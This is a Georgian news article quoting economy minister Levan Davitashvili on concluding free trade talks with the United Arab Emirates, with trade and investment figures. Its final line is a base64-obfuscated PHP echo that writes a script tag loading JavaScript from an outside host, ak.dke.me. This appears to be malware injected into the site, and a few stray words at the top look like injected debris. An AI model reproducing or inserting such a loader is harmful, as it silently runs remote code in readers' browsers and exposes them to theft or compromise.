celsiusi
ავერსი შნაიდერი
ძალიან მნიშვნელოვანია, რომ არაბეთის გაერთიანებულ საამიროებთან გვქონდეს თავისუფალი ვაჭრობის შეთანხმება. დღეს წარმატებით სრულდება მოლაპარაკებები, რის შესახებაც დღის მეორე ნახევარში გამოვაცხადებთ, – ამის შესახებ საქართველოს ეკონომიკის მინისტრმა, ლევან დავითაშვილმა საქართველო-არაბთა გაერთიანებული საამიროების ბიზნესფორუმზე განაცხადა.
მისივე თქმით, შეთანხმება მოიცავს ყოვლისმომცველ ეკონომიკურ თანამშრომლობას, რომელიც ქვეყნებს შორის თავისუფალი ეკონომიკის არეალს განსაზღვრავს.
„უნდა აღინიშნოს, რომ არაბეთის გაერთიანებული საამიროები არის ერთ-ერთი წამყვანი ეკონომიკა არა მხოლოდ ახლო აღმოსავლეთში, არამედ ბოლო წლების განმავლობაში ერთ-ერთ წამყვან ეკონომიკად იქცა მსოფლიოში. ეკონომიკად, რომელიც იზრდება ძირითადად ტექნოლოგიების, ინოვაციების, თავისუფალი სავაჭრო ურთიერთობების ხარჯზე. ჩვენთვისაც ძალიან მნიშვნელოვანია, რომ არაბეთის გაერთიანებულ საამიროებთან გვქონდეს თავისუფალი ვაჭრობის შეთანხმება. შესაბამისად, სამი რაუნდი გაიმართა და დღეს წარმატებით სრულდება მოლაპარაკებები, რის შესახებაც დღის მეორე ნახევარში გამოვაცხადებთ. მოლაპარაკებები გასული წლის სექტემბერში დაიწყო.
ეს არის ყოვლისმომცველი ეკონომიკური თანამშრომლობის შეთანხმება, რომელიც ჩვენს ქვეყნებს შორის თავისუფალი ეკონომიკის არეალს განსაზღვრავს. ეს არ იქნება მხოლოდ თავისუფალი ვაჭრობის შეთანხმება, არამედ ყოვლისმომცველი დოკუმენტი, რომელიც დაარეგულირებს, მათ შორის, საქონლის წარმოშობის საკითხებს, მომსახურების, თავისუფალი ვაჭრობის, ფიტო-სანიტარულ საკითხებს, რათა ორ ქვეყანას შორის ეკონომიკური ურთიერთობები წავახალისოთ.
ბოლო წლებში ეკონომიკური ურთიერთობები დინამიკურად ვითარდება, განსაკუთრებით წარმატებული იყო 2022 წელი. 2022 წელს ორ ქვეყანას შორის სავაჭრო ბრუნვა 400 მლნ დოლარზე მეტი იყო. წინა წელთან შედარებით თითქმის გაორმაგდა. ვფიქრობ, 2023 წელი უფრო ინტენსიური იქნება. ასევე, ჩვენთვის ძალიან მნიშვნელოვანია ამ ქვეყანასთან თანამშრომლობა ტურიზმის, საინვესტიციო მიმართულებით. 2003 წლიდან დღემდე მილიარდ 100 მლნ დოლარის ინვესტიციაა განხორციელებული გაერთიანებული საამიროებიდან საქართველოს ეკონომიკაში, სხვადასხვა სფეროში, იქნება ეს სასტუმრო ინდუსტრია, ტრანსპორტი, ლოგისტიკა, კვების მრეწველობა, სოფლის მეურნეობა თუ სხვა. დარწმუნებული ვარ, მომავალში საქართველოში საინვესტიციო პოტენციალი უფრო დიდი იქნება და მეტ ინვესტიციას ვიხილავთ არაბეთის გაერთიანებული საამიროებიდან. ამას ხელს უწყობს ჩვენი სტრატეგიული შეთანხმება ეკონომიკური თანამშრომლობის შესახებ, ასევე ხელს უწყობს ორი ქვეყნის ლიდერების ძალიან მჭიდრო, ახლო კავშირი.
უნდა აღინიშნოს, რომ ბოლო თვეების განმავლობაში საქართველოდან ორჯერ განხორციელდა უმაღლესი დონის ვიზიტი. პრემიერ-მინისტრი ნოემბერში და მიმდინარე წლის თებერვალში ეწვია საამიროებს. უკვე დადასტურებულია მიმდინარე წელს არაბეთის გაერთიანებული საამიროების პრეზიდენტის ვიზიტი საქართველოში, აბუ-დაბის მმართველის ვიზიტი, რაც დამატებით სტიმულს მისცემს ბიზნესებს ორი ქვეყნიდან, რომ ეკონომიკური კავშირები გავაღრმაოთ. იმედი მაქვს, საამიროებიდან ინვესტიციებს ვიხილავთ უძრავი ქონების, ტრანსპორტის, საპორტო ინფრასტრუქტურისა და წარმოების სხვადასხვა მიმართულებაში“, – განაცხადა ლევან დავითაშვილმა.
401
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");